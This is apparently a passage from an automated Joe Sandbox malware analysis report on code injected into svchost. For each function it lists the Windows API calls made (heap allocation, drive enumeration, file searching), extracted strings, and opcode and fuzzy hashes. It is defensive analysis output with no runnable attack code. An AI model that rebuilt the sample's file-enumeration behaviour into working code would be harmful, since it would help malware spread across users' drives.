                                                                                                                                                                                                                • Instruction ID: a2c7866aae18e335454f32a516ad4e128752a8a92974cfd45b946ef873380998
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd88eab2c7ba76ff40079f4aecfe7b236d5e37179b1fdb5099da81145f6cc21d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0EF05474A84304BBE7709B65EC4BF5E37ACEB05B49F600598FA05E71C0D7B4B5108B64
                                                                                                                                                                                                                Function 02BCF840 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 139COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: private$public
                                                                                                                                                                                                                • API String ID: 0-4176808989
                                                                                                                                                                                                                • Opcode ID: 4a4bcab08c96a9de7a17b48292f18dc2a104350d9cef34a231953395ab11e24a
                                                                                                                                                                                                                • Instruction ID: 39843ed77b78efe42e3a7413c1cb371f84b9090feec5068c6fbfc9ec0bd891b1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a4bcab08c96a9de7a17b48292f18dc2a104350d9cef34a231953395ab11e24a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7414B326042058BCF388A6C85553B67363EBC5358B7846EFD94A8BA54F7A1E545C780
                                                                                                                                                                                                                Function 02BCEB00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02BCE6B0: memset.MSVCRT ref: 02BCE6CF
                                                                                                                                                                                                                  • Part of subcall function 02BCE6B0: memset.MSVCRT ref: 02BCE6F1
                                                                                                                                                                                                                  • Part of subcall function 02BCE6B0: GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02BCE706
                                                                                                                                                                                                                  • Part of subcall function 02BCE6B0: SetErrorMode.KERNEL32(00000001), ref: 02BCE71F
                                                                                                                                                                                                                  • Part of subcall function 02BCE6B0: GetDriveTypeA.KERNEL32(?), ref: 02BCE768
                                                                                                                                                                                                                  • Part of subcall function 02BCE6B0: SetCurrentDirectoryA.KERNEL32(?), ref: 02BCE77B
                                                                                                                                                                                                                  • Part of subcall function 02BCE6B0: FindFirstFileA.KERNEL32(?,?), ref: 02BCE7DD
                                                                                                                                                                                                                  • Part of subcall function 02BCE6B0: SetErrorMode.KERNEL32(?), ref: 02BCEAF3
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D731E), ref: 02BCEB0B
                                                                                                                                                                                                                  • Part of subcall function 02BC39D0: EnterCriticalSection.KERNEL32(02BFFB68,75570F00,00000000,75572F00), ref: 02BC39E9
                                                                                                                                                                                                                  • Part of subcall function 02BC39D0: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 02BC39FB
                                                                                                                                                                                                                  • Part of subcall function 02BC39D0: _snprintf.MSVCRT ref: 02BC3A1B
                                                                                                                                                                                                                  • Part of subcall function 02BC39D0: SetCurrentDirectoryA.KERNEL32(?), ref: 02BC3A2B
                                                                                                                                                                                                                  • Part of subcall function 02BC39D0: PathAddBackslashA.SHLWAPI(?), ref: 02BC3B00
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentDirectory$BackslashDriveErrorModePathmemset$CriticalEnterFileFindFirstLogicalSectionStringsType_snprintf
                                                                                                                                                                                                                • String ID: 617D731E$COLV
                                                                                                                                                                                                                • API String ID: 2461973751-3105192896
                                                                                                                                                                                                                • Opcode ID: 00b8dcb329a326f138f9560f1b994bc10568786b48364314305191a1697257a2
                                                                                                                                                                                                                • Instruction ID: c5962cf860114d36555e0873ec976d626f7e60c00eef312d53b48734c51abdcb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00b8dcb329a326f138f9560f1b994bc10568786b48364314305191a1697257a2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 42B092A1B90300A1709837E83C46C692B6D2A84E023704AEE7643108C54DD18190AB7B
                                                                                                                                                                                                                Function 02BDB0A0 Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: malloc$free
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1480856625-0
                                                                                                                                                                                                                • Opcode ID: 1ff6215390c1cc3faaad82fab9e7b65c946c87036aa253557814946080e39a38
                                                                                                                                                                                                                • Instruction ID: 5c588fcbd2237a84ed566351586b33b83c61fe3700a8216eb36cdb464ce8718b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ff6215390c1cc3faaad82fab9e7b65c946c87036aa253557814946080e39a38
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B21AFB16013059FD710CF1AD984A46FBE8FF99310F15C5AAE6498B362D7B5E910CFA0
                                                                                                                                                                                                                Function 02BBEAE0 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000014,00000000,?,?,?,02BBEF5B,00000000,?,?,00000000,Content-Type,?,?,00000000,Referer), ref: 02BBEB1F
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,02BBEF5B,00000000,?,?,00000000,Content-Type,?,?,00000000,Referer,?), ref: 02BBEB26
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BBEB36
                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,00000014,?,02BBEF5B,00000000,?,?,00000000,Content-Type,?,?,00000000), ref: 02BBEB41
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 471586229-0
                                                                                                                                                                                                                • Opcode ID: 7423c6a89965f8944d68b4886f373f8f7a6adb4de3f56fc3cb5ca7e7a099eb0e
                                                                                                                                                                                                                • Instruction ID: c80bd25a5b6b541bd2388f965fdf9b30b61584d8f4a9929b50189f603fa890c8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7423c6a89965f8944d68b4886f373f8f7a6adb4de3f56fc3cb5ca7e7a099eb0e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7601F2336002156BD7329A68ACC4FEBB7ECEF46760B844781FE16CB191D760E90487E0
                                                                                                                                                                                                                Function 02BBF370 Relevance: 5.0, APIs: 4, Instructions: 35memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,02BBFA2B,?,?,?), ref: 02BBF388
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,02BBFA2B,?,?,?), ref: 02BBF38F
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BBF39F
                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?,?,02BBFA2B,?,?,?), ref: 02BBF3AA
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 471586229-0
                                                                                                                                                                                                                • Opcode ID: 8b181cff673113253bdef02b3a737c826583d8d3e4a7d9acebc80ae3461898fd
                                                                                                                                                                                                                • Instruction ID: 02cd2ca74084abcf3236a32b05680dda7670d2201db481e94ed3f0c922b3afa3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b181cff673113253bdef02b3a737c826583d8d3e4a7d9acebc80ae3461898fd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AF0E533A0161077D6616AA9AC44FAF776CEF867A0F414350FF04EB241CA64DC1487F4
                                                                                                                                                                                                                Function 02BF4130 Relevance: 5.0, APIs: 4, Instructions: 24memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BF4145
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BF4148
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BF4155
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BF4158
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1670920773-0
                                                                                                                                                                                                                • Opcode ID: d1580bcb031b66bd2b2213683ecadffec105f14ca9b64bbfe272fea829f41f0b
                                                                                                                                                                                                                • Instruction ID: 9214d891afc8c2011d47c8a6cb7af97f8f8a0290d7915e91daf54fec394dd846
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1580bcb031b66bd2b2213683ecadffec105f14ca9b64bbfe272fea829f41f0b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71E0EC32A4122877D6A06AB66C08F8BBF6CEF95BA1F458411F719A72409B719414CBF0